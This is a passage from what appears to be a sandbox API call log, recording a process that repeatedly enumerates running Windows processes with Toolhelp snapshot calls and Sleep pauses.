szExeFile="spoolsv.exe")) returned 1 [0148.857] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.858] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.860] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0148.861] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0148.863] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0148.864] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.866] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.867] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0148.869] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0148.870] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0148.871] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0148.873] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0148.874] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0148.875] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0148.876] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0148.877] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0148.878] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0148.879] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0148.881] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0148.882] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0148.883] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0148.884] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0148.885] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0148.886] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0148.887] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0148.888] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0148.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0148.890] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.891] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0148.892] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0148.893] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0148.894] CloseHandle (hObject=0xbc) returned 1 [0148.894] Sleep (dwMilliseconds=0x12c) [0149.208] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0149.216] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0149.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0149.218] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0149.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0149.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0149.220] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0149.221] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0149.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0149.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.223] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.225] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.225] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.226] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0149.227] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.227] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.228] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0149.229] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.231] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.232] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0149.233] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0149.234] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0149.235] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.236] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0149.238] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0149.239] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0149.240] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0149.241] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0149.242] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0149.243] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0149.245] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0149.246] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0149.247] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0149.248] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0149.249] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0149.251] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0149.252] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0149.253] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0149.323] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0149.325] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0149.326] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0149.327] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0149.328] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0149.329] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0149.330] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0149.331] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0149.332] CloseHandle (hObject=0xc4) returned 1 [0149.332] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0149.337] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
